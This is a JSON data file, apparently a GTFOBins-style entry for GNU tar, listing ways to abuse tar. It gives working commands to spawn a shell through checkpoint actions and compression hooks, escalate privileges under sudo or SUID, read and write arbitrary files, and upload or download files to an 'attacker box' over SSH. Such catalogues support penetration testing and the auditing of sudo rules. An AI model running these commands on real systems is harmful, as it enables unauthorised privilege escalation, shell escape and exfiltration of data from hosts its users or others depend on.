You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
51 lines
1.9 KiB
JSON
51 lines
1.9 KiB
JSON
{
|
|
"functions": {
|
|
"shell": [
|
|
{
|
|
"code": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
|
|
},
|
|
{
|
|
"description": "This only works for GNU tar.",
|
|
"code": "tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"'"
|
|
},
|
|
{
|
|
"description": "This only works for GNU tar. It can be useful when only a limited command argument injection is available.",
|
|
"code": "TF=$(mktemp)\necho '/bin/sh 0<&1' > \"$TF\"\ntar cf \"$TF.tar\" \"$TF\"\ntar xf \"$TF.tar\" --to-command sh\nrm \"$TF\"*\n"
|
|
}
|
|
],
|
|
"file-upload": [
|
|
{
|
|
"description": "This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
|
|
"code": "tar cvf [user@host]:[destination_file] [source_file] --rsh-command=/bin/ssh\n"
|
|
}
|
|
],
|
|
"file-download": [
|
|
{
|
|
"description": "This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
|
|
"code": "tar xvf [user@host]:[file] --rsh-command=/bin/ssh\n"
|
|
}
|
|
],
|
|
"file-write": [
|
|
{
|
|
"description": "This only works for GNU tar.",
|
|
"code": "TF=$(mktemp)\necho DATA > \"$TF\"\ntar c --xform \"s@.*@[file]@\" -OP \"$TF\" | tar x -P\n"
|
|
}
|
|
],
|
|
"file-read": [
|
|
{
|
|
"description": "This only works for GNU tar.",
|
|
"code": "tar xf [file] -I '/bin/sh -c \"cat 1>&2\"'\n"
|
|
}
|
|
],
|
|
"sudo": [
|
|
{
|
|
"code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
|
|
}
|
|
],
|
|
"limited-suid": [
|
|
{
|
|
"code": "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
|
|
}
|
|
]
|
|
}
|
|
} |